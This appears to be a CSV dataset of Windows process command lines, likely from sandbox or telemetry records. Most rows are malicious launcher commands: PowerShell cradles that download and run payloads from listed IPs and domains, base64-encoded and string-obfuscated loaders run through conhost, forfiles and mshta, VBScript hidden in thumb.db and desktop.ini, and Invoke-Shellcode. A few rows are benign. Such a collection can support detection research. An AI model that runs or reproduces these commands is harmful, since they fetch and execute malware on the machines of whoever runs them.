"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -exec bypass -w h -file UFbjRkMGfw.ps1","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -exec bypass -w h -file vGhhsvfLkp.ps1","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -exec bypass -w h -file yFvkLHvWTHWCvWJWkugdvkw.ps1","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nO""""p -c ""iEx(New-Object Net.WEbclIent).DoWnLOadstRinG('http://strongvpn.ga/download/WinSecurityUpdate')""
","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nologo -ExecutionPolicy bypass -windowstyle hidden -command calc.exe","C:\WINDOWS\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://120.48.85.228:80/favicon'))""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -w hidden -ep bypass -c ""IEX (New-Object Net.WebClient).downloadstring('http://192.168.1.16:80/taskche.exe')""","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -w hidden -ep bypass -c ""IEX (New-Object Net.WebClient).downloadstring('https://127.0.0.1:80/1.exe')""","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noprofile -executionpolicy bypass -command [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("""")).EntryPoint.Invoke($null, $null)","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -windowstyle hidden -command ""powershell -command \""iwr -outf C:\Users\user\AppData\Local\Temp\out.exe https://github.com/chakal1337/chakal1337.github.io/blob/main/zxzxyy/starter.exe?raw=true; Start-Process C:\Users\user\AppData\Local\Temp\out.exe\""""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -windowstyle hidden -exec bypass -c ""IEX (New-Object Net.WebClient).DownloadString('http://192.168.204.135/link.ps1');test.ps1""","C:\WINDOWS\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -windowstyle hidden -exec bypass -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcA
ZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIA
aAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMA
bwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOQA2ADkAMwA3ADMAOQAzADkA
OAAzADcAMAA1ADkAMAA3ADIALwA5ADkANAAwADIAOQA3ADUAMQAzADgANQA3ADMA
MQAxADQAMgAvAE8AcAB0AGkAbQBpAHoAZQByAC0AMQAwAC4ANwAuAGUAeABlACIA
LAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAZgBpAGwAZQB0AGUAbQBwAG8AcgBhAHIA
eQA0ADgAOAAuAGUAeABlACIAKQA7ACAAcwB0AGEAcgB0ACAAIgAkAGUAbgB2ADoA
dABlAG0AcABcAGYAaQBsAGUAdABlAG0AcABvAHIAYQByAHkANAA4ADgALgBlAHgA
ZQAiAA==","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -windowstyle hidden -exec bypass -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcA
ZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIA
aAB0AHQAcABzADoALwAvAHQAaABlAC4AZQBhAHIAdABoAC4AbABpAC8AfgBzAGcA
dABhAHQAaABhAG0ALwBwAHUAdAB0AHkALwBsAGEAdABlAHMAdAAvAHcAMwAyAC8A
cAB1AHQAdAB5AC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AHQAZQBtAHAAXABmAGkA
bABlAHQAZQBtAHAAbwByAGEAcgB5ADcAMAAwAC4AZQB4AGUAIgApADsAIABzAHQA
YQByAHQAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAZgBpAGwAZQB0AGUAbQBwAG8A
cgBhAHIAeQA3ADAAMAAuAGUAeABlACIA","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -windowstyle hidden -exec bypass -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAbwBuAHQAcgBvAGwALgBlAHgAZQA7ACAASQBXAFIAIAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcABsAGEAYwBrAHkAaABhAGMAawBlAHIALwBtAHMAZwBiAG8AeAAvAG0AYQBpAG4ALwBJAG4AagBlAGMAdABvAHIAUABvAEMALgBwAHMAMQAiACAAfAAgAEkARQBYADsA","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -windowstyle hidden -nologo -NoProfile -ExecutionPolicy ByPass -File explorer.ps1","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -windowstyle hidden Invoke-WebRequest http://179.43.175.187/yjqf/GJOtqSmrGeGD.exe -Outfile c:\windows\temp\browse.exe; Start-Process c:\windows\temp\browse.exe","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -windowstyle hidden Invoke-WebRequest https://cdn.discordapp.com/attachmentd/959003498797713153/9994518768768660/pełe_local.exe -Outfile C:\Windows\Temp\pe_local.exe; Start-Process C:\Windows\Temp\pe_l","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" IEX(New-Object Net.WebClient).DownloadString('http://google.com/one.ps1')","C:\WINDOWS\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" Invoke-Shellcode -Shellcode $buf -ProcessID 1228 -Force","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest 'http://google.com/misss.msi' -OutFile 'msi.msi'","C:\WINDOWS\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri ""http://www.costco.com"" -OutFile ""file"";.\file","C:\Users\user\AppData\Roaming\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri ""https://costco.com"" -OutFile ""file""","C:\Users\user\AppData\Roaming\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'http://20.51.227.181/y0LRhLLWG7JY.exe' -OutFile $env:temp\file.exe; set a=ec; start $env:temp\file.exe","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'http://20.7.43.70/BkRCY.exe' -OutFile $env:temp\file.exe; set a=ec; start $env:temp\file.exe","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'http://20.7.43.70/LtEaG.exe' -OutFile $env:temp\file.exe; set a=ec; start $env:temp\file.exe","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'http://20.7.43.70/SUqTWQdtPa_msmpeng.js' -OutFile $env:temp\file.js; set a=ec; start $env:temp\file.js","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'http://20.96.176.100/NGhJrwsnkZ_sssssssssssss.js' -OutFile $env:temp\file.js; set a=ec; start $env:temp\file.js","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'http://52.149.215.0/svchost.exe' -OutFile $env:temp\file.exe; set a=ec; start $env:temp\file.exe","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'https://gitlab.com/phesmtmm/1/-/raw/main/bbb.exe?inline=false' -OutFile $env:temp\mtmt92293.exe; set a=ec; start $env:temp\mtmt92293.exe","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" [byte[]](1,1,2,3,5,8,13,21,34,55,89,144,233) | Set-Content -Path C:\Users\user\AppData\Local\Temp\fibs.exe -Encoding Byte","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" iex(curl https://cdn.discordapp.com/attachments/985464179785891843/986337483103014922/test.txt)","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\wscript.exe","""C:\WINDOWS\system32\wscript.exe"" //e:VBScript thumb.db ""儿歌""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\WINDOWS\system32\wscript.exe"" //e:VBScript thumb.db ""儿童读物""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\WINDOWS\system32\wscript.exe"" //e:VBScript thumb.db ""呼斯楞""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\WINDOWS\system32\wscript.exe"" //e:VBScript thumb.db ""嗯""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\WINDOWS\system32\wscript.exe"" //e:VBScript thumb.db ""奥尔夫(第一册)""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\WINDOWS\system32\wscript.exe"" //e:VBScript thumb.db ""猫和老鼠""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\WINDOWS\system32\wscript.exe"" //e:VBScript thumb.db ""蒙氏视频""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\WINDOWS\system32\wscript.exe"" //e:VBScript thumb.db ""麻雀""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\WINDOWS\system32\wscript.exe"" /E:jscript ""C:\Users\fatma\AppData\Roaming\Versions\Sysweak\info""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\System32\wscript.exe"" desktop.ini //e:VBScript judge //b","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //B //E:vbs ""VEFLSQM"" ""Mes images""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""1.93_DX5_1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""1.93_DX5_1_XZJ_HK""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""1.93_DX5_1_XZJ_SJ""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""1.93_WF5113_1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""1.93_WF5113_1_XZJ_HK""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""Config""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""Data""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""Lang""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""Log""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""New Harry Potter and...""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""chs""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""eng""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""res_HS_Black""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""res_HS_Blue""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""res_HS_IMaxCan""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" //e:VBScript thumb.db ""res_HS_SaiBo_Blue""","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" TaskSystem.vbs X1 OSECORP"" ""LED"" ""NOICAZIRETCARAC"" "".0","C:\Users\user\Desktop\",1
"C:\Windows\System32\wscript.exe","""C:\Windows\system32\wscript.exe"" WinLeft.vbs X0 sbv tfeLniW","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\MSHTA.exe"" ""http://10.5.1.30/EJ検索/EJサーバー検索.hta""","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" http://192.168.100.14/test.hta","C:\Windows\System32\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" http://a0698262.xsph.ru/see/guilty.xml /f","C:\Windows\System32\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" http://a0705880.xsph.ru/band/sentiment.txt /f","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" http://a0705880.xsph.ru/based/pre.txt /f","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" http://a0705880.xsph.ru/selection/seedling.txt /f","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" http://a0706248.xsph.ru/reject/headlong.txt /f","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" http://a0707869.xsph.ru/headlong/sensitive.txt /f","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" http://a0711854.xsph.ru/registry/decided.pdf","C:\Windows\system32\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" https://127.0.0.1:80/1.hta","C:\Windows\system32\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" https://192.168.1.16:80/run.hta","C:\Windows\system32\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" https://edit-document.ru/seem/seeming.pdf /f","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" https://localhost:80/1.hta","C:\Windows\system32\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" https://www.423down.com/3050.html","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" https://www.423down.com/8718.html","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" vbscript:CreateObject(""Wscript.Shell"").Run(""powershell -c """"iex(New-Object Net.WebClient).DownloadString('https://pst.klgrth.io/paste/9mgja/raw')"""""",0,true)(window.close)","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" vbscript:Execute(""CreateObject(""""WScript.Shell"""").Run """"D:\Programming\osu-server-switcher\target\debug\osu-switcher.exe switch --osu D:/osu! --server osu.ppy.sh"""", 0, False : window.close"")","C:\Windows\System32\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\System32\mshta.exe"" vbscript:Execute(""Set IE = CreateObject(""""InternetExplorer.Application""""):IE.Visible = True:IE.navigate """"https://google.com"""":window.close"")","C:\WINDOWS\system32\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\system32\mshta.exe"" ""javascript:a=GetObject(""script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct"").Exec();close();""","C:\Users\user\Desktop\",1
"C:\Windows\System32\mshta.exe","""C:\Windows\system32\mshta.exe"" javascript:a=GetObject(""script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct"").Exec();close();","C:\Users\user\Desktop\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" -ExecutionPolicy Bypass -windowstyle hidden -command $a = “s$ noisserpxe-ekovnI;)(dnEoTdaeR.redaermaertswen$ = s$;)'txt.GOL\itvgdtcl\cilbuP\sresU\:C'(redaeRmaertS.OI.metsyS tcejbO-weN = redaermaertswen$”;$b = $a.ToCharArray();$b = $a.ToCharArray();[array]::Reverse($b);$c = -join($b);Invoke-expression $c","C:\Users\user\Desktop\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'http://185.156.43.249/chim.ps1' -OutFile C:\Users\user\AppData\Roaming\c22.ps1; powershell -nol -w 1 -nop -ep bypass C:\Users\user\AppData\Roaming\c22.ps1","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'http://185.156.43.249/chimera2.ps1' -OutFile $env:appdata\chimera2.ps1; powershell -nol -w 1 -nop -ep bypass $env:appdata\chimera2.ps1","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'http://185.156.43.249/chimera2.ps1' -OutFile $env:temp\file.exe; start $env:temp\file.exe","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'http://185.156.43.249/chimera6.ps1' -OutFile C:\Users\user\AppData\Roaming\c22.ps1; powershell -nol -w 1 -nop -ep bypass C:\Users\user\AppData\Roaming\c22.ps1","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'http://20.218.128.41/zamp.exe' -OutFile $env:temp\file.exe; start $env:temp\file.exe","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'https://cdn-130.anonfiles.com/A4Jao700y8/e2c3d844-1658605012/lnk.exe' -OutFile $env:temp\file.exe; start $env:temp\file.exe","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1008555817970180106/1012089590561132544/rust-lnk-creator.exe' -OutFile $env:temp\file.exe; start $env:temp\file.exe","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/335177012295630858/1004401115644833883/App.exe' -OutFile $env:temp\file.exe; start $env:temp\file.exe","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/981341904857866272/992940868887658546/vrukeuN0vcMk.exe' -OutFile $env:temp\file.exe; start $env:temp\file.exe","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'https://dosya.co/2kr33ftozbku/sea.exe.html' -OutFile $env:temp\file.exe; start $env:temp\file.exe","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\",1
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" Invoke-WebRequest -Uri 'https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe' -OutFile $env:temp\file.exe; start $env:temp\file.exe","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\forfiles.exe","""C:\Windows\system32\fOrfIles.exe"" /""p"" C:\Windows /""m"" hh* /""c"" ""p""o""wE""r""s""hEl""l AdobeAcrobatPDFReader /w 1 /nOp write.exe a/a;dO{$error.clear();tRy{$e=(.(`ga`l ?rm)terma.dev/0)}caTCh{.(`ga`l ?lee?)120}fInalLy{.(`ga`l ?e[?x])$e}}unTiL(-not$error)""","C:\Users\user\Desktop\",1
"C:\Windows\System32\forfiles.exe","""C:\Windows\system32\fOrfIles.exe"" /""p"" C:\Windows /""m"" hh* /""c"" ""p""o""wE""r""s""hEl""l AdobeAcrobatPDFReader /w 1 /nOp write.exe a/a;dO{$error.clear();tRy{$e=(.(`ga`l ?rm)terma.dev/0)}caTCh{.(`ga`l ?lee?)120}fInalLy{.(`ga`l ?e[?x])$e}}unTiL(-not$error)""","C:\Windows\",1
"C:\Windows\System32\forfiles.exe","""C:\Windows\System32\forfiles.exe"" /m *lnk /c ""cmd /c cur^l http://185.45.192.234/re.css -o ""C:\Users\user\AppData\Local\Temp\l64d3d.cmd""&&""C:\Users\user\AppData\Local\Temp\l64d3d.cmd""&&exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\forfiles.exe","""C:\Windows\system32\fOrfIles.exe"" /""p"" C:\Windows /""m"" hh* /""c"" ""p""o""wE""r""s""hEl""l AdobeAcrobatPDFReader /w 1 /nOp write.exe a/a;dO{$error.clear();tRy{$e=(.(`ga`l ?rm)cobham-satcom.onrender.com/0)}caTCh{.(`ga`l ?lee?)120}fInalLy{.(`ga`l ?e[?x])$e}}unTiL(-not$error)""","C:\Windows\",1
"C:\Windows\System32\forfiles.exe","""C:\Windows\system32\fOrfIles.exe"" /""p"" C:\Windows /""m"" hh* /""c"" ""p""o""wE""r""s""hEl""l AdobeAcrobatPDFReader /w 1 /nOp write.exe a/a;dO{$error.clear();tRy{$e=(.(`ga`l ?rm)terma.icu/0)}caTCh{.(`ga`l ?lee?)120}fInalLy{.(`ga`l ?e[?x])$e}}unTiL(-not$error)""","C:\Windows\",1
"C:\Windows\System32\forfiles.exe","""C:\Windows\system32\forfiles.exe"" /c ""powershell -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AC4AbAB5AC8AZwA5AHoAbwAnACkA""","C:\Users\user\Desktop\",1
"C:\Windows\System32\conhost.exe","""C:\Windows\system32\cOnhost.exe"" --headless powershell $ir='et';new-alias e wg$ir;.$([char](227-122)+'ex')(e -useb riut.top/v)","C:\Users\user\Desktop\",2
"C:\Windows\System32\conhost.exe","""C:\Windows\system32\conhost.exe"" --headless powershell -c $io=$([char](226-121));set-alias a set-alias;a f $io'wr';a np $io'ex'; ;np (f -usebasicparsing 'djue.fun/k')","C:\Users\user\Desktop\",1
"C:\Windows\System32\conhost.exe","""C:\Windows\system32\conhost.exe"" --headless powershell -c $io=$([char](226-121));set-alias a set-alias;a f $io'wr';a np $io'ex'; ;np (f -usebasicparsing 'mvue.fun/v')","C:\Users\user\Desktop\",1
"C:\Windows\System32\conhost.exe","""C:\Windows\system32\conhost.exe"" --headless powershell -c $je=$([char](225-120));set-alias a set-alias;a f $je'wr';a np $je'ex'; ;np (f -usebasicparsing 'dygb.pl/ef')","C:\Users\user\Desktop\",1
"C:\Windows\System32\conhost.exe","""C:\Windows\system32\conhost.exe"" --headless powershell -c $je=$([char](225-120));set-alias a set-alias;a f $je'wr';a np $je'ex'; ;np (f -usebasicparsing 'wufv.pl/h')","C:\Users\user\Desktop\",1
"C:\Windows\System32\conhost.exe","""C:\Windows\system32\conhost.exe"" --headless powershell -c $je=$([char](225-120));set-alias a set-alias;a f $je'wr';a np $je'ex'; ;np (f -usebasicparsing 'yuie.pl/h')","C:\Users\user\Desktop\",1
"C:\Windows\System32\conhost.exe","""C:\Windows\system32\conhost.exe"" ""powershell -enc bQBzAGgAdABhAC4AZQB4AGUAIABqAGEAdgBhAHMAYwByAGkAcAB0ADoAYQA9AEcAZQB0AE8AYgBqAGUAYwB0ACgAIgBzAGMAcgBpAHAAdAA6AGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ATABPAEwAQgBBAFMALQBQAHIAbwBqAGUAYwB0AC8ATABPAEwAQgBBAFMALwBtAGEAcwB0AGUAcgAvAE8AUwBCAGkAbgBhAHIAaQBlAHMALwBQAGEAeQBsAG8AYQBkAC8ATQBzAGgAdABhAF8AYwBhAGwAYwAuAHMAYwB0ACIAKQAuAEUAeABlAGMAKAApADsAYwBsAG8AcwBlACgAKQA7AA==""","C:\Users\user\Desktop\",1
